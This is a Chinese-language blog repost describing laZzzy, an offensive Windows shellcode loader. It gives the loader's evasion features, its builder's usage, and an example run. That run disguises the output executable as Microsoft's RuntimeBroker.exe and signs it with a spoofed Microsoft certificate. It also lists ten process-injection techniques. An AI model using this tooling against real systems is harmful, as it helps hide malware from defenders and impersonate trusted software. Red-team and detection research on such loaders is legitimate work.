laZzzy – shellcode 加载器

渗透技巧 1年前 (2022) admin
573 0 0

特征

  • 直接系统调用和本机 ( Nt*) 函数(不是所有函数,但大多数)

  • 导入地址表 (IAT) 规避

  • 加密有效负载(XOR 和 AES)

    • 随机生成的密钥

    • x90使用 NOPS ( )自动填充有效负载(如有必要)

    • 有效负载的逐字节内存解密

  • XOR 加密字符串

  • PPID欺骗

  • 阻止非 Microsoft 签名的 DLL

  • (可选)克隆PE图标和属性

  • (可选)使用欺骗性证书进行代码签名


带有 Visual Studio 和以下组件的 Windows 机器,可以从Visual Studio Installer>Individual Components安装:

  • C++ Clang Compiler for WindowsandC++ Clang-cl for build tools

laZzzy - shellcode 加载器

ClickOnce Publishing

laZzzy - shellcode 加载器

(venv) PS C:MalDevlaZzzy> python3 .builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options: -h, --help show this help message and exit -s path to raw shellcode -p password -m shellcode execution method (e.g. 1) -tp process to inject (e.g. svchost.exe) -sp process to spawn (e.g. C:\Windows\System32\RuntimeBroker.exe) -pp parent process to spoof (e.g. explorer.exe) -b binary to spoof metadata (e.g. C:\Windows\System32\RuntimeBroker.exe) -d domain to spoof (e.g. www.microsoft.com)
shellcode execution method: 1 Early-bird APC Queue (requires sacrificial proces) 2 Thread Hijacking (requires sacrificial proces) 3 KernelCallbackTable (requires sacrificial process that has GUI) 4 Section View Mapping 5 Thread Suspension 6 LineDDA Callback 7 EnumSystemGeoID Callback 8 FLS Callback 9 SetTimer 10 Clipboard


例子:

执行builder.py并提供必要的数据

(venv) PS C:MalDevlaZzzy> python3 .builder.py -s .calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\Windows\System32\notepad.exe -d www.microsoft.com -b C:\Windows\System32\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[+] XOR-encrypting payload with [*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with [*] IV: f96312f17a1a9919c74b633c5f861fe5 [*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using [*] Technique: Early-bird APC Queue [*] Process to inject: None [*] Process to spawn: C:\Windows\System32\RuntimeBroker.exe [*] Parent process to spoof: svchost.exe
[+] Spoofing metadata [*] Binary: C:\Windows\System32\RuntimeBroker.exe [*] CompanyName: Microsoft Corporation [*] FileDescription: Runtime Broker [*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800) [*] InternalName: RuntimeBroker.exe [*] LegalCopyright: © Microsoft Corporation. All rights reserved. [*] OriginalFilename: RuntimeBroker.exe [*] ProductName: Microsoft® Windows® Operating System [*] ProductVersion: 10.0.22621.608
[+] Compiling project [*] Compiled executable: C:MalDevlaZzzyloaderx64ReleaselaZzzy.exe
[+] Signing binary with spoofed cert [*] Domain: www.microsoft.com [*] Version: 2 [*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6 [*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com [*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06 [*] Not Before: October 04 2022 [*] Not After: September 29 2023 [*] PFX file: C:MalDevlaZzzyoutputwww.microsoft.com.pfx
[+] All done! [*] Output file: C:MalDevlaZzzyoutputRuntimeBroker.exe

Shellcode 执行技术

  1. Early-bird APC Queue (需要牺牲过程)

  2. 线程劫持(需要牺牲进程)

  3. KernelCallbackTable (需要具有 GUI 的牺牲进程)

  4. 截面视图映射

  5. 线程暂停

  6. LineDDA回调

  7. EnumSystemGeoID 回调

  8. 光纤本地存储 (FLS) 回调

  9. 设置定时器

  10. 剪贴板


https://github.com/capt-meelo/laZzzy


原文始发于微信公众号(Khan安全攻防实验室):laZzzy – shellcode 加载器

版权声明:admin 发表于 2022年12月23日 上午8:01。
转载请注明:laZzzy – shellcode 加载器 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...